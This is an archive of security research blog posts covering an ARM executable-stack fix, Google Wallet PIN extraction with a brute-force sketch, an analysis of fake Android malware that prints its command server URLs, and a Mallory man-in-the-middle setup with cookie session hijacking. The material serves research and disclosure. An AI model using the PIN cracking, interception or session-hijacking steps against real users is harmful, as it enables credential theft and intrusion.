Intrepidus Group
Insight

Author Archives: 0xD1AB10

Raspberry Pi: Wheezy And Her Non-Non-Executable Stack (nnx)

Posted: August 8, 2012 – 5:13 pm | Filed under: ARM, Raspberry Pi

A few weeks ago I was lucky enough to score a Raspberry Pi from bNull. This awesome little device seemed to be the hottest new gadget to add to the haxoring desk, and after reviewing the specs, it’s not hard to see why. The RPi is quite a versatile piece of hardware. A quick check with Google uncovered scores of blogs featuring projects that use the Raspberry Pi. Another, unrelated, check of my RSS feed suggested that practical ARM exploitation is a pretty important topic. This was enough to convince me that it’s time to teach myself real-world ARM exploitation techniques using a Raspberry Pi! Before I start blogging about that, however, I’d like to share an interesting discovery that came about while setting up the RPi testbed.

While setting up my test environment I noticed something very interesting. After upgrading my RPi from the initial Debian image available earlier to the new Raspbian Wheezy image, all my binaries now had an executable stack. The screenshot below shows the memory layout of a simple program I wrote that has a vanilla stack-based buffer overflow bug.

Notice that the stack of this process, located at 0xbea31000, has read, write, and execute permissions applied to it. This was quite a surprise to me, since this very same binary did not have an executable stack when executed on the previous default RPi Debian image. So what changed? And what was this libcofi_rpi library that was loaded into memory?

A quick search revealed that libcofi_rpi is the optimized memcpy and memset library packaged with the Wheezy distribution. It is loaded into memory using /etc/ld.so.preload, which is simply a list of libraries to inject into every process, one absolute path per line. Could this be making the stack executable?

Let’s step back for a second: why would a stack be made executable? This article summed it up nicely. Simply put, a stack will be made executable if:

1. GCC generates code that requires an executable stack.
2. ASM source (.s files) explicitly asks for executable stack.
3. ASM source (.s files) is missing a GNU-stack note. (A common bug)

If a binary is compiled from source meeting one of the above conditions, or loads a shared object that met any of them when it was built, the process’ stack will be marked executable. Knowing that my binary previously had a noexec stack, and that libcofi_rpi.so was now loaded into its memory, I was pretty sure the library explicitly asked for an executable stack. In fact, a quick scan of the shared object (below) did reveal that the library was compiled to have an RWX stack!
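If you want to check a binary yourself, readelf -lW will print the GNU_STACK program header and its flags. The short Python sketch below does the same check by hand for 32-bit little-endian ELFs like the RPi’s; it is a minimal illustration, not a full ELF parser.

#!/usr/bin/env python
# Minimal sketch: report whether a 32-bit little-endian ELF asks for an
# executable stack by inspecting its PT_GNU_STACK program header.
# (readelf -lW shows the same information.)
import struct
import sys

PT_GNU_STACK = 0x6474e551
PF_X = 0x1

def stack_is_executable(path):
    with open(path, "rb") as f:
        elf = f.read()
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if elf[4] != 1:
        raise ValueError("this sketch handles 32-bit ELF only")
    # ELF32 header: e_phoff at offset 28, e_phentsize at 42, e_phnum at 44
    e_phoff, = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, = struct.unpack_from("<I", elf, off)
        p_flags, = struct.unpack_from("<I", elf, off + 24)  # ELF32 p_flags
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    # No PT_GNU_STACK header at all: the kernel then falls back to an
    # executable stack on most architectures.
    return True

if __name__ == "__main__":
    path = sys.argv[1]
    print("%s: stack %s" % (path, "RWX" if stack_is_executable(path) else "RW"))

Pointing this at the preloaded shared object (the libcofi_rpi.so path listed in /etc/ld.so.preload) reports RWX before the fix described below, and RW after it.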

So, now that we have found the problem, how do we fix it? I pulled down the open source libcofi_rpi and checked whether any of the above conditions were true. Lo and behold, the code is written in ARM assembly and neither of the two source files includes the GNU-stack note. This forces the assembler to create a shared object that requests an executable stack. By adding the note (the standard directive is .section .note.GNU-stack,"",%progbits; pictured below, line 336) and recompiling the source files, the shared object should now request only a read/write stack.

After making these edits to the source files and rebuilding the shared object, a quick scan of the ELF indicated that the library did indeed require only a read/write stack (image below). Simply overwriting the old shared object with this new binary should fix Wheezy’s eXotic stack.

Rerunning my test server and reviewing its memory layout confirmed that we are now back to an RW stack and ready to learn ARM exploitation on a relatively up-to-date system.

All of these edits were pushed to the libcofi_rpi project hosted on GitHub. If you have an RPi and want the fix now, I suspect you will have to pull it down manually; I am not sure how long it will take to make it into the Debian image.


Google Wallet coming for iOS?

Posted: March 15, 2012 – 11:42 am | Filed under: android, iOS, Mobile Security, NFC, RFID

The list of two OS types in WalletShared: ANDROID and IOS

Let’s start by saying this is no smoking gun, but a pretty interesting case of information leakage through an application. Our regular blog readers will know we’ve been looking into NFC based applications over the past year. The jewel of all NFC apps is easily Google Wallet, and thus we’ve spent a large amount of time trying to understand it. When you decompile an Android application that isn’t obfuscated, you’re able to see the same class names, method names, variable names, and other identifiers as in the developer’s source code. In this case, Google Wallet includes a package called “wallet.proto” which contains parsers for any “Protocol Buffer” formatted data the application uses. While the name “Protocol Buffers” sounds generic, it’s actually Google’s well-documented mechanism for serializing data (think of it as their version of XML or PLists). If you followed the Google Wallet PIN hashing issue, you’ll remember that the PIN hash is stored in a protocol buffer.

The “WalletShared” protocol buffers package in the current version of Google Wallet contains hints of iOS within the parser definitions. This includes defining the “DeviceContext -> HardwareType” field with only two values: “ANDROID” and “IOS”. iOS strings are also found in two additional protocol buffers called “IosDevice” and “IosWallet”. The classes leak only a little detail about the information being collected, which includes items named “appId”, “appVersion”, “walletUuid”, and a few “model” and “version” items.

Function names with "iOS" in the string

Now you might ask why anything about an iOS application, written in Objective C, would get compiled into an Android application, written in Java. This could happen because of how a Protocol Buffer structured data definition file is created. A developer typically creates a “.proto” file, a language-independent file that defines the data structure. This “.proto” file is then compiled using the “protoc” application, which creates the appropriate files for the language you are programming in. Thus, it’s simple to use the same “.proto” file to create a Java object or an Objective C object if they are both going to use the same data structure. While Objective C is not in the official protocol buffers package, there is an add-on for that language available. Thus it is quite likely that if there were a “shared” data structure which both clients and the server would need to parse, the same “.proto” file would be used regardless of the application’s programming language.
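To make that concrete, here is a hypothetical fragment of what such a shared definition might look like. The message and field names below are our reconstruction from the decompiled class names, not Google’s actual wallet.proto source.

// Hypothetical reconstruction from the decompiled class names;
// not Google's actual wallet.proto.
message DeviceContext {
  enum HardwareType {
    ANDROID = 1;
    IOS = 2;
  }
  optional HardwareType hardware_type = 1;
}

message IosWallet {
  optional string app_id = 1;       // "appId" in the decompiled classes
  optional string app_version = 2;  // "appVersion"
  optional string wallet_uuid = 3;  // "walletUuid"
}

A single definition like this, compiled with protoc’s Java back end for Android and the third-party Objective C add-on for iOS, would yield the matching parser classes we found in the APK.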

Of course, if Google is developing Google Wallet for iOS, it raises numerous questions. Since iOS devices do not currently include an NFC radio or secure element, is Google planning to release a case, or “sleeve,” with these components? Or do they know something about the next iPhone we don’t? And if the next iPhone does have NFC and a Secure Element, would Apple allow Google access to those components? In any case, if Google is working on developing their wallet for iOS, this could be a sign of strong commitment by Google to contactless payment technology. And that’s a win for everyone regardless of which device is in your pocket right now.


Google Wallet PIN Brute Forcing

Posted: February 9, 2012 – 10:46 am | Filed under: android, Mobile Security, NFC, Tools

Google Wallet is a project of great interest right now as it is a big shift in how we pay for goods and services in the US (Japan is quite far ahead of everyone on mobile payments). Some researchers have discovered that Google Wallet is storing the PIN for your wallet on the device in a relatively insecure format. Since this information was already released into the wild, we felt we should share our perspective and how we would approach this problem. The PIN data is stored in the application’s SQLite database.

The SQLite database is stored in the Google Wallet data directory. Google Wallet stores the PIN in the proto column of the metadata table. The data is encoded using the protobuf format (also by Google). The following SQL query retrieves the data:

select hex(proto) from metadata where id = "deviceInfo";
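If you have pulled the database off a rooted device, Python’s stdlib sqlite3 module is enough to run the query; the database file name below is hypothetical, so substitute the path of your local copy.

# Sketch: pull the hex-encoded protobuf blob out of a local copy of the
# Wallet database. The file name here is hypothetical.
import sqlite3

conn = sqlite3.connect("walletDatastore.db")
row = conn.execute(
    "select hex(proto) from metadata where id = 'deviceInfo'").fetchone()
print(row[0])  # hex-encoded protobuf, ready for the decoding step below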

This query retrieves the protobuf data encoding a number of device- and user-specific values. Protobuf is a data serialization format, similar to JSON in concept. Next, the data must be deserialized. The standard way to work with protobuf data is to define a .proto file, which acts as a key for deserialization. These .proto files get compiled down to application-specific code and are not shipped in their human-readable form. Raj decided to write a generic protobuf decoder (Protobuf Easy Decode). This Python module can decode protobuf data without a .proto file, although some information (such as field names) is inevitably lost when reading raw protobuf data this way.
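To give a feel for what decoding without a .proto file involves, here is a minimal sketch of a wire-format walker, not the Protobuf Easy Decode module itself. It handles only varint and length-delimited fields, and recovers field numbers and raw bytes rather than the names or types a .proto file would supply.

# Minimal sketch of walking raw protobuf wire format without a .proto file.
# Handles only varint (wire type 0) and length-delimited (wire type 2) fields.

def read_varint(buf, pos):
    # Decode a base-128 varint starting at pos; return (value, next_pos).
    value, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
        shift += 7

def walk(buf):
    pos = 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        field, wire_type = key >> 3, key & 0x7
        if wire_type == 0:    # varint: ints, enums, and similar
            value, pos = read_varint(buf, pos)
            print("field %d: varint %d" % (field, value))
        elif wire_type == 2:  # length-delimited: strings, nested messages
            length, pos = read_varint(buf, pos)
            print("field %d: %d bytes: %s" % (field, length, buf[pos:pos + length].hex()))
            pos += length
        else:
            raise ValueError("wire type %d not handled in this sketch" % wire_type)

# walk(bytes.fromhex("...hex output of the SQL query above..."))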

Recovering the PIN from the decoded data required some understanding of the specific .proto structure. Once the salt and the hash of the salted PIN are retrieved, brute forcing the PIN is a trivial matter: brute_pin.py illustrates how to brute force the PIN.
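As a sketch of that final step, assuming (as was publicly reported) that the stored value is a SHA-256 digest of the salt concatenated with the four-digit PIN, the entire search space of 10,000 candidates falls in well under a second:

# Sketch of the brute force, assuming the reported scheme:
# SHA-256 over the salt concatenated with the four-digit PIN.
import hashlib

def brute_pin(salt, target_hex):
    for candidate in range(10000):
        pin = "%04d" % candidate
        if hashlib.sha256(salt + pin.encode()).hexdigest() == target_hex:
            return pin
    return None

# Hypothetical values, not a real wallet's:
# print(brute_pin(b"5224260677", "aa7d1fc0..."))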

 

@0xd1ab10 and @0xb3nn


ARM, Pipeline and GDB, Oh My!

Posted: September 22, 2011 – 12:19 am | Filed under: ARM

This post will start with an important question. Look at Listing 1 below; after executing the instruction located at main+12, what values will be stored in r0 and r1? Take a moment to consider this.

Listing 1: Disassembly of main()

My first (albeit incorrect) answer was that r0 would have 0x000083bc (main+8) stored in it and that r1 would have 0x000083c8 (main+12+8) stored in it (the address of the instruction, plus the value from the add instruction). I thought this because I made a few assumptions about the state of the processor during the execution of the instructions. First, I assumed that while executing the instruction located at main+8, “mov r0, pc“, the pc register would have the address main+8 stored in it, and therefore that address would be moved into r0. I also assumed that while executing the instruction at main+12, “add r1, pc, #8“, the pc register would have the address main+12 stored in it, and this address plus 8 would be moved into r1. According to Listing 2, I felt that GDB supported my assumptions by showing the pc register holding the address of the currently executing instruction.

Listing 2: GDB reported pc values before execution of instructions.

By examining r0 and r1 while executing the instruction located at main+16 (Listing 3), it became obvious my two predictions would not come to pass. The r0 register had 0x000083c4 stored in it and the r1 register had 0x000083d0 stored in it. Perplexed, I needed to understand the mechanism at work here.

Listing 3: Actual values of r0 and r1

After a few minutes of thinking, I started to remember a topic covered in my NYU-Poly computer architecture class: pipelining. I then noticed that both of the values were exactly 0x8 higher than I expected. A quick Google search turned up the fact that the ARM processor executing my code has a 3-stage pipeline with a 4-byte fixed instruction size.

To understand this problem, we now have to get into some details of ARM processor architecture. Pipelining, as it relates to a processor, is an optimization of how instructions are executed. When a processor executes one instruction, there are normally a few distinct steps involved. For example, ARM’s pipeline stages include fetch, decode, and execute* (see note at end of post). The processor must first load the instruction from memory (fetch), decipher what the instruction must accomplish (decode), and perform the operations necessary to complete the instruction (execute). Each step usually maps to a set of components inside the processor and requires a certain amount of time. In addition, the steps must be performed in a strictly serial manner per instruction. In a non-pipelined processor, only one phase of one instruction is performed at a time, leaving the hardware responsible for the other stages idle. A pipelined processor is designed to keep every stage busy with some instruction all of the time.

Let us work through an example (Image 2): during one clock cycle, Instruction 1 will be in the execute phase, Instruction 2 will be in the decode phase, and Instruction 3 will be in the fetch phase. So why is this important? From a high-level point of view, the pc register points to the currently executing instruction. This is the convention that GDB employs. However, from an ARM pipeline point of view, the physical pc register always points to the instruction currently being fetched. The reason for this resides in the deepest levels of the ARM processor architecture: the pc register is used as a direct input into the address register, which is used to index memory when fetching the instruction. See Image 1 below from “ARM System-on-Chip Architecture, Second Edition” for a good diagram of this.

Image 1: ARM layout (source: ARM System-on-Chip Architecture, Second Edition)

Our example image below shows a time-based view of this processor over the course of 5 clock cycles. Carefully analyzing Image 2 during clock cycle 3, we see that the instruction being fetched is 2 instructions after the instruction being executed. Therefore, within the processor, pc must point 2 instructions past the currently executing instruction, or 8 bytes ahead (each instruction is 4 bytes long). Instructions that use the value stored in the pc register will be using this actual value of pc. When we see an instruction such as “mov r0, pc”, we can read it as “r0 gets pc + 8”, where pc is the address of the currently executing instruction as reported by GDB.

Image 2: Pipeline (Source: http://winarm.scienceprog.com/arm-mcu-types/how-does-arm7-pipelining-works.html)

 

With this in mind, the correct answers to the initial question are:
r0 = 0x000083c4 = (main+8) + 8 = 0x000083bc + 8
r1 = 0x000083d0 = (main+12) + 8 + 8 = 0x000083c0 + 8 (pipeline) + 8 (immediate)

As you can see, these solutions match what was observed by GDB. Yay!
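If it helps to see the mechanism in motion, below is a toy model of the 3-stage pipeline. It shifts instruction addresses through the fetch, decode, and execute stages once per clock and prints the gap between the executing address and the fetch address that the physical pc tracks; it is a sketch for intuition, not a cycle-accurate ARM model.

# Toy 3-stage pipeline with 4-byte instructions: the address being fetched
# (what ARM's physical pc tracks) stays 8 bytes ahead of the address being
# executed. A sketch for intuition, not a cycle-accurate ARM model.

BASE = 0x83B4            # pretend this is main
INSN_SIZE = 4

fetch, decode, execute = BASE, None, None
for cycle in range(1, 6):
    if execute is not None:
        print("cycle %d: executing 0x%05X, pc (fetching) 0x%05X, delta %d"
              % (cycle, execute, fetch, fetch - execute))
    # advance the pipeline one stage per clock
    execute, decode, fetch = decode, fetch, fetch + INSN_SIZE

From cycle 3 onward the delta is always 8, which is exactly the offset observed in r0 and r1 above.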

So what are the key lessons learned? Depending on the number of pipeline stages and the specific hardware, the gap between the address of the currently executing instruction and the value stored in the physical program counter register (eip, pc, rip, etc.) will vary. It is important to research this behavior for any processor architecture you are going to be reverse engineering, writing shellcode for, or simply writing assembly to be executed on.

-Raj

*Note: There are many different ARM processors and pipeline architectures; however, this description is enough to understand the general mechanism at work.


This is not the Android Market Security Tool you are looking for

Posted: March 11, 2011 – 12:46 am | Filed under: android, android.bgserv, Cryptography, jailbreak, jailbreaking, Mobile Security

We have been actively following and analyzing the spate of malware in the Android Market. The most recent outbreak to light up the blogosphere has been Droid Dream. Google’s response was to launch a search and destroy mission: they created the Android Market Security Tool (AMST) and pushed it to all handsets known to have downloaded and installed infected applications. The tool disinfects compromised handsets by eradicating all remnants of the Droid Dream trojan. However, what we found quite interesting is that shortly after the release of AMST, a trojaned version of the AMST appeared and is making the rounds on the internet! (Yo dawg…)

Symantec performed an initial analysis on this piece of malware and found some interesting links between the malware and a hosted Google Code project. This sparked our interest, so we decided to get a sample of the malware and perform our own analysis.

The first obvious difference is that the application requests very different permissions from the official Google tool, including the ability to change network settings and perform actions, such as sending and receiving SMS, that can be used fraudulently.

This image illustrates the permissions the application is granted. In particular, it is allowed to change the network state, a fact which becomes important when coupled with some of the capabilities of this malware, which we will discuss shortly. The features of this malware are almost identical to the Fake 10086 malware, which has been previously analyzed. When we looked at the disassembled version of the fake AMST, it does appear to be extremely similar to the code found on this Google Code repository. Keep in mind this is malware targeting Android devices using Google’s own code hosting repository system to track its development.

So what does this opensource malware do? One thing it does is change your Wireless Application Protocol (WAP) server and your APN. The capture below shows the Java version of this code doing that:

How this capability is used is unclear, but the fact that it is setting your APN, which is essentially where you access the Internet from on the carrier network, is a bit troubling. Additionally, the application has the ability to intercept SMS messages by abusing the RECEIVE_SMS permission. It uses this to filter out SMS from certain numbers so that the malware can receive SMS messages that the user is never aware of. The application then responds and takes some actions based on that SMS. Again, here is the Java code for clarity:

Another interesting feature of this malware is that it hooks the phone call receiver. On any call the phone receives, it looks for two specific numbers: “10086” (hence the name Fake 10086 for this malware’s variant) and “10010”. Both of those numbers are associated with Chinese telecom carriers. The point of all these lovely “features” is to prevent the user from reaching carrier support and getting the malware removed. The malware’s main purpose is to message a “vedio” service, err, “video” service, and rack up SMS charges. The capture below illustrates some of the URLs and VEDIO love.

private static final String CMWAP = "cmwap";
public static final String CMNET = "cmnet";
// private static final String SERVER_URL = "http://go.ruitx.cn/Coop/request3.php";
private static final String SERVER_URL = "http://www.youlubg.com:81/Coop/request3.php";
// private static final String VEDIO_URL = "http://211.136.165.53/wl/rmw1s/pp66.jsp";
private static final String VEDIO_URL_REAL = "http://211.136.165.53/adapted/choose.jsp?dest=all&chooseUrl=QQQwlQQQrmw1sQQQpp66.jsp";
private static final Uri uri_apn = Uri.parse("content://telephony/carriers/preferapn");
private static final Uri uri_apn_list = Uri.parse("content://telephony/carriers");

Seems pretty ballzy to have the malicious source code posted on a Google Code repository, so we wanted to know more about this aspect. While the author seems to have worked on a few other projects, “mmsbg” seems to be the only thing updated by this account on Google Code recently. We had to wonder what type of jokes this guy would put in the signature that signed the trojaned APK file. A quick “keytool -printcert” of the CERT.RSA file is listed below. Notice the “EMAILADDRESS=lorenz@londatiga.net“.

Let’s see what is up at londatiga.net. Seems to be an Android developer with some APK files posted. Wonder what cert was used to sign the “AnReboot Widget” package which you can download from the site.

Notice the matching fingerprints (the MD5 and SHA1 lines). Looks like both the malware sample and the “AnReboot Widget” posted on the Londatiga site are signed with the same private key. What are the chances of that… we thought. Turns out Lorenz dropped a private key in a tutorial blog post on signing Android applications and then used it for this app (although his Android Market apps are signed with a different key). Anyhow, it is a good reminder that they’re called “private” keys for a reason. Might be time to generate a new one if you are using a key that has been downloaded by others.

Another point of interest is the whois result for the IP address in the malware:


inetnum: 211.136.96.0 - 211.136.191.255
netname: CMNET-shanghai
descr: China Mobile Communications Corporation - shanghai company
country: CN
admin-c: HL888-AP
tech-c: HL888-AP
mnt-by: MAINT-CN-CMCC
mnt-lower: MAINT-CN-CMCC-shanghai

The malware makes HTTP posts to this address. One final point we will raise is that the malware can also set the user’s APN to a CMNET APN.

Regardless of the true intent of this malware, the malware authors of the world have clearly struck the first blow in the mobile malware war. This will be a fascinating space to watch as the collision of malware, personal data and mobile devices occurs.

@bitexploder, benn, jross, sid and DIAB1069


The Secret is Out: WSJ on Mobile Application Privacy

Posted: December 20, 2010 – 10:57 am | Filed under: android, Articles, iOS, jailbreak, Mobile Security

Good morning! Like many of us, my morning includes a warm cup of coffee, working my way through some e-mails, and skimming through the blogosphere. About halfway through this ritual I came across one very interesting piece by the Wall Street Journal. To call this article a simple blog post doesn’t do it justice: the story is the result of countless hours of mobile application analysis. The WSJ worked with our friends at Electric Alchemy to perform an in-depth study on how some of the most popular Android and iOS apps protect, or rather disregard, our privacy. During this study, Electric Alchemy found that you cannot count on mobile applications to “keep your secrets”. Over half the apps tested transmitted data that could uniquely identify your device, a little less than half sent out some form of location data, and a small number even sent out personal information such as name and gender. The WSJ created an interesting and interactive portal to analyze their findings. It’s nice to see a piece like this use so much visualization.

It was also nice to see that our tool Mallory was used during part of the analysis. We hope to see more uses of Mallory like this and are committed to keeping it updated and maintained. Once again, our hats off to EA and the WSJ. Well done!

Cheers,

Raj Umadas


Mallory and Me: Setting up a Mobile Mallory Gateway

Posted: December 15, 2010 – 8:48 pm | Filed under: Mobile Security, Tools

Over the past few months, we have put Mallory through its paces. Scores of mobile applications have had their network streams MiTM’d by Mallory, and it has become one of the few tools we use on a daily basis. Because we use it so often, we sometimes forget that it may seem quite difficult to get up and running for the first time. Mallory is still actively developed, and improving the user experience from the initial code checkout to “Mallorizing” traffic is a key goal for the project. Until then, this howto guide should suffice to get Mallory up and running for your testing needs.

This guide will explain how to get Mallory up and running (in this guide I use an EeePC). I use a tethered Android device for the WAN connection, and have MiTM victims connect to the netbook over its WiFi interface. I will also share how we use a tool called hostapd to make the EeePC look like an infrastructure-mode WiFi access point, as opposed to an ad-hoc one. Using this guide, you should be able to set up a mobile Mallory gateway in no time.

Step Zero: The Gear.

For this guide I will be using my EeePC 1000HE with Ubuntu 10.04 LTS installed on it as the reference design. Many netbooks/OS/WiFi card combos should work. I will also be using my Nexus One handset running Cyanogen Mod to provide the WAN connection. Feel free to leave comments below on your setup.

Step One: Downloading the dependencies.

The first step is to install the libraries and packages required to run Mallory. The apt-get commands below should pull down and install all dependencies hosted in Ubuntu’s repositories; you can copy and paste them into your terminal to download everything at once. (Note that the last two packages are used for pre-packaged Mallory plug-ins: the paramiko package is used to MiTM SSH connections, and the imaging package is used to manipulate images within an HTTP response.)

sudo apt-get install mercurial;
sudo apt-get install python-pyasn1;
sudo apt-get install python-netfilter;
sudo apt-get install libnetfilter-conntrack-dev;
sudo apt-get install python2.6-dev;
sudo apt-get install python-setuptools;
sudo easy_install pynetfilter_conntrack;
sudo apt-get install netfilter-extensions-source;
sudo apt-get install libnetfilter-conntrack3-dbg;
sudo apt-get install python-paramiko;
sudo apt-get install python-imaging;

You will also need to download and install the netfilter connection tracking package. We have tested Mallory with the versions below and recommend using them until we can confirm that newer versions of the package are compatible with Mallory.

If you are installing Mallory on a 32-bit system, you will need to download the following package:

#If you are installing Mallory on a 32 bit machine
wget http://ubuntu.cs.utah.edu/ubuntu/pool/universe/libn/libnetfilter-conntrack/libnetfilter-conntrack1_0.0.99-1_i386.deb
sudo dpkg -i libnetfilter-conntrack1_0.0.99-1_i386.deb
#endif

If you are installing Mallory on a 64-bit system, you will need to download the following package:

#if you are installing Mallory on a 64 bit machine
wget http://ubuntu.cs.utah.edu/ubuntu/pool/universe/libn/libnetfilter-conntrack/libnetfilter-conntrack1_0.0.99-1_amd64.deb
sudo dpkg -i libnetfilter-conntrack1_0.0.99-1_amd64.deb
#endif

Step Two: Downloading and Installing hostapd

Before we start pulling down the Mallory code base, it is helpful to take a step back and install and configure hostapd. This step is not required for Mallory to run as a mobile gateway (one can always set up an ad-hoc WiFi network). To install hostapd, run the following apt-get command:
sudo apt-get install hostapd

After installing hostapd, we need to set up the configuration file, which can be found at /etc/hostapd/hostapd.conf. Below is a sample of the configuration I use; I only present the parameters I changed, and all other parameters were kept at their defaults. Use your favorite editor to make the required changes.

# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for
# management frames); ath0 for madwifi
interface=wlan0

# Driver interface type (hostap/wired/madwifi/prism54/test/none/nl80211/bsd);
# default: hostap). nl80211 is used with all Linux mac80211 drivers.
# Use driver=none if building hostapd as a standalone RADIUS server that does
# not control any wireless/wired driver.
driver=nl80211

# SSID to be used in IEEE 802.11 management frames
ssid=TestNet

# Static WEP key configuration
# The key number to use when transmitting.
# It must be between 0 and 3, and the corresponding key must be set.
wep_default_key=0

# The WEP keys to use.
wep_key0=AAAAA11111

Users with other WiFi cards or drivers might have to experiment with the “driver” and “interface” parameters. Searching the internet for your specific card and driver should return a number of tutorials on getting hostapd running on your box. Again, please leave comments below with hostapd configuration settings for specific setups.

Step Three: Getting Mallory

Now that we have mercurial installed (see Step One), we can use the hg command to pull down the Mallory code base. Navigate to the directory where you want the code and run the following command.
hg clone http://bitbucket.org/IntrepidusGroup/mallory
It should look something like this:

Step Four: Setting up the Gateway

We now have all the required code, packages, libraries, and mythical creatures in place to start Mallorizing victims (the leprechauns, fairies, and ground unicorn horn come preinstalled in 10.04). For pedagogical purposes, starting Mallory will be a two-step process. It is important to understand that Mallory runs on a gateway; it is not a gateway in and of itself. Therefore we need to make sure our netbook is acting as a gateway for the clients before we start Mallory. This will ensure that any misconfigurations get caught early and are easy to troubleshoot.

Using the script below, your netbook will be converted into a lean, mean routing machine. You will need to run this script as root. When prompted, enter the interfaces for the WAN and LAN links. For my setup, my tethered Android handset provides internet connectivity to the netbook via interface usb0, so usb0 is my WAN link; the WiFi interface servicing the clients is wlan0, so wlan0 is my LAN interface. You will need to use the appropriate interfaces for your setup. For example, if you are using an ethernet connection to reach the internet, the WAN interface could be eth0.

#!/bin/sh
echo "Wan Interface: "
read wanInt
echo "Wifi Interface: "
read lanInt

echo "Stopping network manager"
/etc/init.d/NetworkManager* stop
echo "Stopping dnsmasq"
/etc/init.d/dnsmasq stop
echo "Bringing down lan interface"
ifconfig $lanInt down
echo "Starting hostapd"
hostapd -B /etc/hostapd/hostapd.conf
echo "Applying configs to lan interface"
ifconfig $lanInt 10.0.0.1 netmask 255.255.255.0
echo "Starting DHCP server"
dnsmasq --no-hosts --interface $lanInt --no-poll --except-interface=lo --listen-address=10.0.0.1 --dhcp-range=10.0.0.10,10.0.0.100,60m --dhcp-option=option:router,10.0.0.1 --dhcp-lease-max=50 --pid-file=/var/run/nm-dnsmasq-wlan0.pid

echo "Stopping firewall and allowing everyone..."
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT

echo "Turning on Natting"
iptables -t nat -A POSTROUTING -o $wanInt -j MASQUERADE
echo "Allowing ip forwarding"
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Adding 4.2.2.1 to resolv.conf
echo "nameserver 4.2.2.1" >> /etc/resolv.conf
echo "GO GO gadget gateway"

After executing this script, you should be able to connect clients to the newly created WiFi network. This would also be a good time to test that the clients have internet connectivity. If this test fails, some troubleshooting is in order.

Things to double check would be:

  • Did you run the script as root? (sudo)
  • Can the gateway get out to the internet? (ping)
  • Does the LAN interface have an IP? (ifconfig)
  • Is the DHCP server running? (ps)
  • Are the DNS servers configured properly? (cat /etc/resolv.conf)

Troubleshooting this step is slightly outside the scope of this post; however, feel free to leave comments about any difficulties and we can try to help out.

Step Five: Starting Mallory

So we have our equipment, we downloaded the dependencies, we configured our conf files, and we had a short lesson on how to set up an Ubuntu gateway… sounds like it’s Mallorizing time. All that is left is to start Mallory and force our gateway to funnel all network streams into Mallory’s one listening socket. The iptables commands below tell the gateway to redirect all TCP and UDP streams originating from our LAN (wlan0) into a local socket listening on port 20755, the port Mallory is configured to listen on.

sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp -m tcp -j REDIRECT --to-ports 20755
sudo iptables -t nat -A PREROUTING -i wlan0 -p udp -m udp -j REDIRECT --to-ports 20755

To start Mallory, we need to run mallory.py as root. (Note: Mallory is not backdoored.) This Python file is located in the mallory/src directory. The command below should start Mallory as root.

sudo python ./mallory/src/mallory.py

After you run the above command, Mallory should be up and running. To test this out, connect a client to Mallory and visit an image-heavy website. By default, Mallory is configured with the HTTP module enabled and the image flipping and image color inverting plugins turned on. You should see something like this (notice the two images are upside down and their colors are inverted).

By default, Mallory is also configured to run the cookie hijacking plugin. Using the Mallory Cookie Editor plugin for Chrome, you can copy a cookie captured by Mallory and apply it to your browser with one click, letting you hijack any HTTP session flowing through Mallory. If HTTPS MiTMing is turned on, sessions “secured” by HTTPS can be hijacked as well (provided the users click through the cert warnings). The Chrome plugin needs to run in a Chrome browser on the Mallory gateway itself. Below, you can see an example of the Mallory Cookie Editor for Chrome.

Step Six: What is next?

We have TCP streams flowing through Mallory, we see images being manipulated, and we are hijacking sessions of popular websites: what’s next? Well, Mallory is first and foremost a testing tool, and there is a variety of functionality that can be unlocked with a few lines of code and configuration: MiTMing SSL streams, pausing and editing streams with the graphical TCP stream debugger, and quickly writing data manipulation routines that automatically operate on streams of HTTP data (also controllable on the fly in the Mallory GUI). All of this (and more) can easily be done with Mallory. In the near future, we will be posting tutorials on how to accomplish many of these tasks. Before we get there, though, this is the first step that must be completed. Once you have a setup that can flip images, you can dive head first into the world of Mallory!

-D1AB1069-


WebOS: Examples of SMS delivered injection flaws

Posted: April 16, 2010 – 2:59 pm | Filed under: Mobile Security

(Note: the findings herein affect WebOS 1.3.5. Palm has since released WebOS 1.4, which fixes these vulnerabilities, though not all handsets or carriers are running this version. Due to contractual agreements, the public disclosure of this information was delayed.)

Intrepidus Group has been doing mobile application security testing for over three years now, and during this time we’ve discovered and responsibly disclosed a number of vulnerabilities in Brew, Windows Mobile, BlackBerry, and iPhone applications. We have been contracted time after time to perform threat modeling, penetration testing, and various other security assessments on these platforms. So, as anyone would expect, we were all looking forward to getting a look at Palm’s new WebOS platform.

While closely following the blogosphere around WebOS and reading documents released by Palm, we started to understand the revolutionary paradigm shift that Palm was attempting: a mobile platform that functions like a web browser; a platform whose applications are written in JavaScript and HTML; and an API reference so simple that anyone reasonably familiar with web application programming could create the next revolutionary social media app in no time.

When a customer shipped us our first Pre devices to test their application, we spent spare cycles exploring the rest of WebOS. Our initial impressions were quite positive. There was just so much to love: Linux underneath, the platform’s open nature, the user interface, and the hardware. However, the honeymoon ended abruptly once we started to explore WebOS’s security posture.

As we started to pry a little, it became quite apparent that Palm’s new WebOS platform was riddled with some pretty dangerous bugs. These bugs can all be traced back to the fact that WebOS is essentially a web browser and its applications are written in JavaScript and HTML. This also means that WebOS applications are subject to the numerous web application vulnerabilities that any seasoned penetration tester would be all too familiar with. We were also quite surprised at how quickly these vulnerabilities were discovered: within a matter of hours, we started to uncover a number of low-hanging-fruit vulnerabilities that would be considered quite dangerous under even the most forgiving of standards.

